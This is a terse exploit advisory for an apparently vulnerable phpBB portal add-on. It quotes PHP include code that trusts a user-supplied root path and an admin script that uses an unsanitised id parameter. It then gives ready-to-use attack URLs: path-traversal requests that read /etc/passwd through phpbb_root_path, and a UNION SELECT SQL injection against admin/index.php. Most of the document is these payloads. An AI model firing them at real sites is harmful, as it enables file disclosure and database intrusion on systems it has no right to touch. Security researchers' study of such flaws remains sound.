include($phpbb_root_path . 'includes/bbcode.' . $phpEx); includes/acp/acp_lcxbbportal.php $phpbb_portal_path = $phpbb_root_path . 'portal/'; require_once($phpbb_portal_path . 'includes/portal_block.' . $phpEx); require_once($phpbb_portal_path . 'includes/adm_portal_block.' . $phpEx); include($phpbb_root_path . 'includes/functions_display.' . $phpEx);
http://site.com/portal/includes/portal_block.php?phpbb_root_path=../../../../../../../etc/passwd http://site.com/includes/acp/acp_lcxbbportal.php?phpbb_root_path=../../../../../../../etc/passwd
$act = $_GET['act']; ..... if($act=="edit" || $act=="new"){ $id = $_GET['id'];
http://site.com/admin/index.php?act=edit&id=-56%20union%20select%201,2,version(),4--